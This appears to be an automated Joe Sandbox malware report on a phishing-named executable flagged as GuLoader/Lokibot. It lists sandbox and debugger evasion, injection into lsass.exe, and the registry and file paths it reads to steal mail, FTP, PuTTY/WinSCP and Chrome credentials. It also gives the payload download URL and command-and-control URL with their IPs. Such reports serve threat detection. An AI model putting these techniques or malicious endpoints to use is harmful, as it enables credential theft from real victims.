        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://FABRICRAFT.CO.ZA/FARMANT_HHVNWJNA195.BIN
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304Thread sleep count: 335 > 30
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304Thread sleep time: -20100000s >= -30000s
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B36F rdtsc
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread delayed: delay time: 60000
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSystem information queried: ModuleInformation
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicshutdownNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
        Source: lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmpBinary or memory string: DOMAINS\Builtin\Aliases\Names\Hyper-V Administrators
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicvss
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864964902.00000000008DB000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp7
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
        Source: lsass.exe, 0000000C.00000002.242864168995.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311349709.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330424875.000001896A613000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B36F rdtsc
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227ADAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227A66D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE7D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227536A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022757CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275822 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275802 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277DAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02279224 LdrInitializeThunk,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory written: C:\Windows\System32\lsass.exe base: 1896A5B0000
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory written: C:\Windows\System32\lsass.exe base: 1896B540000
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1896A5B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1896B540000 protect: page execute and read and write
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeThread created: C:\Windows\System32\lsass.exe EIP: 6A5B0000
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected LokibotShow sources
        Source: Yara matchFile source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Tries to steal Mail credentials (via file / registry access)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
        Tries to harvest and steal ftp login credentialsShow sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality:

        barindex
        Yara detected LokibotShow sources
        Source: Yara matchFile source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection312Masquerading1OS Credential Dumping2Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion221Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection312Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery4Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ORDINE + DDT A.M.F SpA.exe22%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        farmanat.ro11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://farmanat.ro/arman30/five/fre.php12%VirustotalBrowse
        https://farmanat.ro/arman30/five/fre.php100%Avira URL Cloudmalware
        http://farmanat.ro/arman30/five/fre.php11%VirustotalBrowse
        http://farmanat.ro/arman30/five/fre.php100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        fabricraft.co.za
        		197.242.150.64
        		truefalse
          		high
          farmanat.ro
          		176.223.209.128
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://farmanat.ro/arman30/five/fre.phptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          https://fabricraft.co.za/Farmant_hhVNwJna195.binfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
              		high
              https://fabricraft.co.za/ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                		high
                https://fabricraft.co.za/Farmant_hhVNwJna195.binnORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                  		high
                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                          		high
                          https://fabricraft.co.za/.ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                              		high
                              https://farmanat.ro/arman30/five/fre.phpORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmptrue
                              • 12%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                                		high
                                http://www.live.comlsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.msn.comlsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
                                      		high
                                      https://fabricraft.co.za/Farmant_hhVNwJna195.binws;ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                                        		high
                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpfalse
                                          		high
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpfalse
                                            		high
                                            https://fabricraft.co.za/Farmant_hhVNwJna195.bincORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpfalse
                                              		high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              176.223.209.128
                                              		farmanat.roUnited Kingdom
                                              		39756ROHOSTWAY-ASROtrue
                                              197.242.150.64
                                              		fabricraft.co.zaSouth Africa
                                              		37611AfrihostZAfalse

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:528460
                                              Start date:25.11.2021
                                              Start time:10:45:15
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 4s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:ORDINE + DDT A.M.F SpA.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Run name:Suspected Instruction Hammering
                                              Number of analysed new started processes analysed:14
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/5@3/2
                                              EGA Information:Failed
                                              HDC Information:Failed
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                              • HTTP Packets have been reduced
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.54.122.82
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:48:01API Interceptor876x Sleep call for process: ORDINE + DDT A.M.F SpA.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              176.223.209.128ATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              farmanat.roATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.__vbaHresultCheckObj.9268.exeGet hashmaliciousBrowse
                                              • 176.223.209.128

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AfrihostZAoQANZnrt9dGet hashmaliciousBrowse
                                              • 169.35.135.240
                                              Akiru.arm7Get hashmaliciousBrowse
                                              • 169.66.132.25
                                              Akiru.armGet hashmaliciousBrowse
                                              • 169.121.9.247
                                              HLiQSIwlY7Get hashmaliciousBrowse
                                              • 169.79.178.207
                                              aZsszSGIEVGet hashmaliciousBrowse
                                              • 169.127.19.203
                                              2Mxp7Z86k3Get hashmaliciousBrowse
                                              • 169.222.34.97
                                              sora.x86Get hashmaliciousBrowse
                                              • 169.74.42.79
                                              c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                                              • 169.166.190.64
                                              x86_64-20211124-0649Get hashmaliciousBrowse
                                              • 169.74.152.242
                                              arm-20211124-0649Get hashmaliciousBrowse
                                              • 169.168.89.229
                                              sora.arm-20211123-2050Get hashmaliciousBrowse
                                              • 169.222.83.73
                                              zxIlLJKaukGet hashmaliciousBrowse
                                              • 169.114.115.195
                                              6PZ6S2YGPBGet hashmaliciousBrowse
                                              • 169.164.169.154
